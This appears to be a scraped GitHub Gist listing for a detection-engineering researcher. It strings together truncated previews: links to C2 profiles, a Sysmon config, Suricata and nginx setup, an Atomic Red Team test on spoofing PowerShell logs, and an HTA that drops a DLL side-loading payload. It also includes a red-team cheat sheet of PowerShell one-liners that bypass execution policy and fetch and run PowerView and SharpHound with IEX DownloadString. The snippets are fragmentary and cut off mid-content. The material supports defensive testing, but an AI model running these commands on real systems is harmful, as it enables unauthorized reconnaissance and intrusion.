Skip to content

Instantly share code, notes, and snippets.

spawnto
https://raw.githubusercontent.com/kphongagsorn/c2-profiles/29fe50eaad655ddd0028fca06a9c7785e3ffaf41/amazon.profile
https://raw.githubusercontent.com/kvcallfield/Cobalt-Strike-C2-profiles/cae44634d57c0d8a099e50f6d4e9b73acaaab9d6/amazon2.profile
https://raw.githubusercontent.com/KevinCooper/24AF-CyberChallenge/67f531777f7912c7129f633f43e06fba79c5f3e2/CobaltStrike/cobalt.profile
https://raw.githubusercontent.com/webcoderz/agressor-scripts-/950064776853cf4dd7403d0f75b5306fe275fcc3/Malleable-C2-Profiles-master/APT/meterpreter.profile
https://raw.githubusercontent.com/hadesangel/Malleable-C2-Profiles/390937aec01e0bcdaf23312277e96e57ac925f7b/APT/meterpreter.profile
https://raw.githubusercontent.com/ianxtianxt/Malleable-C2-Profiles/07fd3b45c4166c9aecdcfa54cddc905c22f6ff85/APT/meterpreter.profile
https://raw.githubusercontent.com/seclib/Malleable-C2-Profiles/390937aec01e0bcdaf23312277e96e57ac925f7b/APT/meterpreter.profile
https://raw.githubusercontent.com/rsmudge/Malleable-C2-Profiles/390937aec01e0bcdaf2331227
https://raw.githubusercontent.com/FortyNorthSecurity/C2concealer/3630a87e56a1e36ea0d907903fc9b7460419e71f/C2concealer/components/postex.py
https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/Payload_Type/apollo/agent_code/Apollo/CommandModules/SpawnTo.cs
https://raw.githubusercontent.com/kphongagsorn/c2-profiles/29fe50eaad655ddd0028fca06a9c7785e3ffaf41/amazon.profile
https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/documentation-payload/apollo/commands/spawnto_x64.md
https://raw.githubusercontent.com/TheRipperJhon/CAPE/2bc977577a8fcc81a46046fe5bf9248ed3ac0c28/modules/processing/parsers/malwareconfig/CobaltStrike.py
https://raw.githubusercontent.com/Tylous/SourcePoint/7bebe641d9c0d2dbc41c27ef621333f257cbd3e6/Struct/Struct.go
https://raw.githubusercontent.com/MythicAgents/Apollo/92958fc2c9511d738bc1cd2dd44405c650991014/documentation-payload/apollo/opsec.md
https://raw.githubusercontent.com/nsquar3/malware_analysis/e7f3070f4
- name: ScriptBlock Smuggling
description: This test demonstrates the use of ScriptBlock Smuggling to spoof PowerShell logs.
supported_platforms:
- windows
input_arguments:
spoofed_command:
description: The benign command to be logged.
type: string
default: Write-Output 'Hello'
executed_command:
@MHaggis
MHaggis / allthesysmon.xml
Last active June 6, 2024 17:14
Hunt Naked
<Sysmon schemaversion="4.90">
<HashAlgorithms>md5,sha256</HashAlgorithms>
<DnsLookup>False</DnsLookup>
<CheckRevocation>False</CheckRevocation>
<ArchiveDirectory>sysmon</ArchiveDirectory>
<EventFiltering>
<!--Event ID 1: Process creation-->
<ProcessCreate onmatch="exclude"></ProcessCreate>
<!--Event ID 2: A process changed a file creation time-->
<FileCreateTime onmatch="exclude"></FileCreateTime>
# Two step:
# 1.) Install the suricata TA to $splunkUF/etc/apps on a Windows System, not Linux box.
# 1.a) Modify the inputs to index=network
# 1.b) Ensure the monitor path is windows specific to the eve.json file for Suricata
# 2.) Run this script from disk, or copy and paste into PowerShell/PowerShell_ISE. Run.
# 2.a) The script will prompt you to double click the installation of npcap.exe in c:\temp.
$exepath = "c:\temp"
$suricataPath = 'C:\Program Files\Suricata'

STRT Attack Range Nginx.conf

The following is the base nginx.conf file utilized to proxy to applications. Note the most important part is the logging kv, in which we log as much data with. This is CIM compliant and does map to the Splunk Web Datamodel.

user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
local function file_exists(path)
local file = io.open(path, "r")
if file then
file:close()
return true
end
return false
end
print([[
@MHaggis
MHaggis / RedTeam_CheatSheet.ps1
Created November 25, 2019 16:06 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
<html>
<head>
<title>Atomic Red Team - DLL Side-Loading HTA</title>
<HTA:APPLICATION ID="AtomicSideLoad" APPLICATIONNAME="AtomicSideLoad" BORDER="thin" BORDERSTYLE="normal" ICON="shell32.dll,4" >
<script language="VBScript">
Dim shell
Set shell = CreateObject("Wscript.Shell")
' Base64 encoded content of invite.zip - which is https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary">https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary
Dim base64EncodedContent
@MHaggis
MHaggis / handlers
Created June 2, 2022 19:06
Get-Item Registry::HKEY_CLASSES_ROOT\* | Select-Object "Property","PSChildName" | Where-Object -Property Property -Match "^URL*" | Export-Csv -path c:\temp\url_all.csv
bingmaps
calculator
callto
conf
DLNA-PLAYSINGLE
Explorer.AssocActionId.BurnSelection
Explorer.AssocActionId.EraseDisc
Explorer.AssocActionId.ZipSelection
Explorer.AssocProtocol.search-ms
Explorer.BurnSelection